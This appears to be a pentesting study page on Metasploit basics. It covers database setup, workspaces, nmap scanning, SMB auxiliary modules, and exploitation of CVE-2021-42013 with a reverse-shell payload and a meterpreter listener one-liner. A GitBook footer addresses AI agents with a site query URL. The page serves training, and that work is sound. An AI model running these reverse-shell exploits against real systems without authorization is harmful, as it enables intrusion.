# 101 ## Setup ### Database **Metasploit Framework (MSF)** in Kali Linux doesn't start its database (PostgreSQL) by default, but it’s useful for storing target data and tracking exploits. ```bash # Initialize database sudo msfdb init # Start PostgreSQL service sudo service postgresql start # Launch MSF Console sudo msfconsole -q # Check database connection msf6 > db_status [*] Connected to msf. Connection type: postgresql. ``` ### Workspaces MSF uses **workspaces** to separate different tests and avoid data mix-up. ```bash # Check current workspace msf6 > workspace # Create a new workspace msf6 > workspace -a test_ws [*] Added workspace: test_ws # Switch to a specific workspace msf6 > workspace test_ws [*] Workspace: test_ws # Check current workspace again msf6 > workspace default * test_ws ``` Scan results will now be saved in the selected workspace. ```bash # Scan target msf6 > db_nmap -A 192.168.50.202 # List discovered hosts msf6 > hosts # List discovered services msf6 > services # List hosts with port 445 (e.g., SMB service) msf6 > services -p 445 ``` ## Modules MSF includes **modules** for various purposes, categorized for ease of use. ```bash # List module categories msf6 > show -h ``` ### Auxiliary **Auxiliary modules** perform tasks like scanning, fuzzing, and enumeration. ```bash # List all auxiliary modules msf6 > show auxiliary # Filter modules by type msf6 > search type:auxiliary smb # Filter by name (e.g., SMB version scanner) msf6 > search smb_version # Use a specific module msf6 > use 0 # View module info msf6 auxiliary(scanner/smb/smb_version) > info # List module options msf6 auxiliary(scanner/smb/smb_version) > show options # List required options msf6 auxiliary(scanner/smb/smb_version) > show missing # Set required options msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.50.202 # Run module msf6 auxiliary(scanner/smb/smb_version) > run ``` ### Exploit **Exploit modules** in MSF target specific vulnerabilities in applications or services. Key Features: * **Database Integration**: Automatically tracks targets, services, and vulnerabilities. * **Reliability**: Repeatable sessions for stable access. * **Payload Flexibility**: Users can select payloads based on the exploit. {% code overflow="wrap" %} ```bash # Create a workspace for exploits msf6 > workspace -a exploits msf6 > workspace exploits # Set target host msf6 > setg RHOSTS 192.168.225.16 # Search for CVE-2021-42013 exploit msf6 > search CVE-2021-42013 # Select exploit module msf6 > use 0 # Configure payload and options msf6 exploit(multi/http/apache_normalize_path_rce) > set LHOST 192.168.45.242 msf6 exploit(multi/http/apache_normalize_path_rce) > set SSL false msf6 exploit(multi/http/apache_normalize_path_rce) > set RPORT 80 msf6 exploit(multi/http/apache_normalize_path_rce) > set payload linux/x64/shell_reverse_tcp # Run exploit msf6 exploit(multi/http/apache_normalize_path_rce) > run ``` {% endcode %} ## Sessions & Jobs **Sessions** manage interactions with successfully exploited targets. **Jobs** run in the background. ```bash # Background the current session ^Z Background session 1? [y/N] y # List active sessions msf6 > sessions -l # Interact with a session msf6 > sessions -i 1 # Close a session msf6 > sessions -k 1 ``` ## Inline Commands {% code overflow="wrap" %} ```bash $ msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 192.168.45.157; set LPORT 9999; exploit -j" ``` {% endcode %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://x7331.gitbook.io/boxes/tools/metasploit/101.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.